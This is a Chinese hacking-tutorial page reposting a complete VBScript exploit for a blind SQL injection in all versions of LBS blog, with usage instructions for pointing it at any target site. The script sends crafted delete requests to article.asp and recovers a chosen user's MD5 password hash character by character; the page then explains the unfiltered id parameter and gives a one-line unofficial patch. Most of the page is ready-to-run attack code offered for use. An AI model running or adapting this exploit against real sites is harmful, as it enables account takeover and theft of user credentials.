首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

LBS blog sql注射漏洞(统杀所有版本)


http://www.gipsky.com/
exp如下

'============================================================================

'使用说明:

' 在命令提示符下:

' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=破解 target="_blank"><font color=red>破解</font></a></b>的博客用户<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=密码 target="_blank"><font color=red>密码</font></a></b>

'如:

' cscript.exe lbsblog.vbs <a href="http://www.xxxx.com/blog/" target=_blank>www.xxxx.com/blog/</a> 1 1

' by loveshell.net[B.C.T]

'============================================================================

On Error Resume Next

Dim oArgs

Dim olbsXML 'XMLHTTP对象用来打开目标网址

Dim TargetURL '目标网址

Dim userid,articleid '博客用户名

Dim TempStr '存放已获取的部分 MD5<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=密码 target="_blank"><font color=red>密码</font></a></b>

Dim CharHex '定义16进制字符

Dim charset



Set oArgs = WScript.arguments

If oArgs.count < 1 Then Call ShowUsage()



Set olbsXML = createObject("Microsoft.XMLHTTP")



'补充完整目标网址

TargetURL = oArgs(0)

If LCase(Left(TargetURL,7)) <> "<a href="http://"" target=_blank>http://"</a> Then TargetURL = "<a href="http://"" target=_blank>http://"</a> & TargetURL

If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"

TargetURL=TargetURL & "article.asp"



articleid=oArgs(1)

userid=oArgs(2)

TempStr=""

CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")



WScript.echo "LBS blog All version Exploit"&vbcrlf

WScript.echo "By 剑心"&vbcrlf

WScript.echo "<a href="http://www.loveshell.net/" target=_blank>http://www.loveshell.net/</a> Just For fun :)"&vbcrlf&vbcrlf

WScript.echo " # # the site now"&vbcrlf



Call main(TargetURL,BlogName)



Set oBokeXML = Nothing



'----------------------------------------------sub-------------------------------------------------------

'============================================

'函数名称:main

'函数功能:主程序,注入获得blog 用户<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=密码 target="_blank"><font color=red>密码</font></a></b>

'============================================

Sub main(TargetURL,BlogName)

Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage

For MainOffset = 1 To 40

For SubOffset = 0 To 15

TempLen = 0

postdata = ""

postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"



OpenURL = TargetURL



olbsXML.open "Post",OpenURL, False, "", ""

olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"

olbsXML.send "act=delete&id="& escape(postdata)

GetPage = BytesToBstr(olbsXML.ResponseBody)

'判定访问的页面是否存在

If InStr(GetPage,"deleted")<>0 Then

'"博客用户不存在或填写的资料有误" 为错误标志 ,返回此标志说明 猜解的 MD5 不正确

'假如得到 0000000000000000 的 MD5 值,请修改错误标志

ElseIf InStr(GetPage,"permission")<>0 Then

TempStr=TempStr & CharHex(SubOffset)

WScript.Echo " Crack now:"&TempStr

Exit for

Else

WScript.echo vbcrlf & "Something error" & vbcrlf

WScript.echo vbcrlf & GetPage& vbcrlf

WScript.Quit

End If

next

Next

WScript.Echo vbcrlf& " We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"

End sub



'============================================

'函数名称:BytesToBstr

'函数功能:将XMLHTTP对象中的内容转化为GB2312编码

'============================================

Function BytesToBstr(body)

dim objstream

set objstream = createObject("ADODB.Stream")

objstream.Type = 1

objstream.Mode =3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = "GB2312"

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function



'============================

'函数名称:ShowUsage

'函数功能:使用方法提示

'============================

Sub ShowUsage()

WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"

WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"

WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" <a href="http://www.loveshell.net/" target=_blank>http://www.loveshell.net/</a> 1 1"

WScript.echo ""

WScript.Quit

End Sub



<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>说明:



src_article.asp中的

......

input["log_id"]=func.checkInt(input["log_id"]);

if(!input["id"]){

strError=lang["invalid_parameter"];

}else{

// Check if the article exists

theArticle.load("log_id, log_authorID, log_catID","log_id=" input["id"]);

strError=false;

}

......



过滤的是log_id,但是使用的确实id,呵呵 :)



然后呢?

class/article.asp中的代码

this.load = function(strselect, strwhere){

var tmpA=connBlog.query("select TOP 1 " strselect " FROM [blog_Article] where " strwhere);

if(tmpA){

this.fill(tmpA[0]);

return true;

}else{

return false;

}

}



上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!

function articledelete(){

if(theUser.rights["delete"]<1){

// Check User Right - without DB Query

pageHeader(lang["error"]);

redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "(script removed)window.history.back();", false, "errorbox");

}else{

var theArticle=new lbsArticle();

var strError;

默认情况下guest都有删除权限的,尽管后面还做了判定,但是注入已经发生,而我们正好利用他的判定注射,呵呵



LBS blog sql注射<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>非官方补丁

打开:src_article.asp,找到:



input["log_id"]=func.checkInt(input["log_id"]);

if(!input["id"]){

strError=lang["invalid_parameter"];

}else{

// Check if the article exists

theArticle.load("log_id, log_authorID, log_catID","log_id=" input["id"]);

strError=false;

}

将其中的 theArticle.load("log_id, log_authorID, log_catID","log_id=" input["id"]);



修改为: theArticle.load("log_id, log_authorID, log_catID","log_id=" func.checkInt(input["id"])); 即可
<< Flash木马程序是怎样练成的 用ASP实现反向连接控制 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号